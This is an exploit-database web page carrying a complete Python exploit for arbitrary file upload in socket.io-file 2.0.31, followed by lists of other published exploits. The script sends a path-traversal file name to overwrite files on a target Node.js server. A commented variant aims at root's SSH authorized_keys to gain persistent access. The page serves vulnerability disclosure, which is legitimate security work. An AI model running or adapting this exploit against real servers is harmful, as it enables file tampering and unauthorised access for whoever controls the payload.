Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"Socket.io-file 2.0.31 - Arbitrary File Upload"

Author

Exploit author

Cr0wTom

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload
# Date: 2020-07-02
# Exploit Author: Cr0wTom
# Vendor Homepage: https://www.npmjs.com/package/socket.io-file
# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31
# Version: <= v2.0.31
# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0
# CVE: -

# Requirements: pip install socketIO-client-nexus==0.7.6

#!/usr/bin/env python

import sys
import json
import os
from socketIO_client_nexus import SocketIO, LoggingNamespace

def file_creation(RHOST, RPORT):
    print ('Initiating connection...')
    with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:

        print ('Creating file...')

        # Example server running in /home/testuser/Documents/socket-app so customize the path appropriately 
        # Change the "name" option if you want to create an other file in an different path of the system
        socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})

        # Example for server running with root access:
        # socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})
        
        print ('Writing data to file...')

        # Add the data you want to get written to the file
        data = "Exploited by Cr0wTom"
        json_string = json.dumps(data)
        socketIO.once("socket.io-file::request::u_0", on_aaa_response)
        socketIO.emit("socket.io-file::stream::u_0", json_string)

def on_aaa_response(*args):
    print('on_aaa_response', args)

def print_usage():
    print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
    print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
    print ('Usage: python3 exploit.py <RHOST> <RPORT>')
    print ('RHOST        The target host IP address or domain.')
    print ('RPORT        The target host port number of the nodejs server.')

if __name__ == '__main__':

    # ensure we have at least an IP and Port
    if len(sys.argv) < 3:
        print_usage()
        sys.exit(1)

    print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
    print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
    file_creation(sys.argv[1], sys.argv[2])
Release Date Title Type Platform Author
2020-10-23 "Lot Reservation Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'id' SQL Injection" webapps php "Ankita Pal"
2020-10-23 "Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-10-20 "WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)" webapps multiple n1x_
2020-10-14 "NodeBB Forum 1.12.2-1.14.2 - Account Takeover" webapps multiple "Muhammed Eren Uygun"
2020-10-12 "Liman 0.7 - Cross-Site Request Forgery (Change Password)" webapps multiple "George Tsimpidas"
2020-10-05 "MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection" webapps multiple "Aviv Beniash"
2020-09-28 "Joplin 1.0.245 - Arbitrary Code Execution (PoC)" webapps multiple "Ademar Nowasky Junior"
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-22 "Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution" webapps multiple "Milad Fadavvi"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
Release Date Title Type Platform Author
2020-07-26 "Socket.io-file 2.0.31 - Arbitrary File Upload" webapps multiple Cr0wTom
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48713/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.